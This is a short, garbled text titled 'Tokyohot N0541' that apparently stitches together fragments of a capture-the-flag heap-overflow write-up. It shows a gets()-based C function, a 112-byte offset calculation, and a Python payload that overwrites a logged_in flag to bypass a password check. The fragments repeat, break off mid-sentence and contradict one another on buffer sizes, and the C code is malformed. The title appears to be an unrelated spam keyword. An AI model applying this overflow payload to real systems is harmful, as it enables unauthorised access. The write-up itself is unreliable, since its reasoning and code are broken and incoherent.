Tokyohot N0541 -

0x603200 - 0x603090 = 0x70 (112) bytes The password buffer is only 0x80 (128) bytes, so we have of headroom before we start overwriting logged_in .

The interesting functions are register_user , login , and show_secret . void register_user() char *name = malloc(0x80); char *pwd = malloc(0x80); printf("Name: "); gets(name); // <--- vulnerable printf("Password: "); gets(pwd); // store pointers in a global struct (userlist) tokyohot n0541

$ ./n0541 1) Register > 1 Name: AAAAA... Password: BBBBB... [debug] pwd ptr = 0x603090 The global logged_in lives at 0x603200 . The distance is: 0x603200 - 0x603090 = 0x70 (112) bytes The

def login_overwrite(s): menu(s) s.sendall(b'2\n') recvuntil(s, b'Password: ') # 112 filler + 0x01 + newline payload = b'A' * 112 + b'\x01' + b'\n' s.sendall(payload) Password: BBBBB

Compile with the original flags:

void register_user(void) char *name = malloc(0x80); char *pwd = malloc(0x80); if (!name

heap: 0x603010 -> name buffer (0x80) 0x603090 -> pwd buffer (0x80)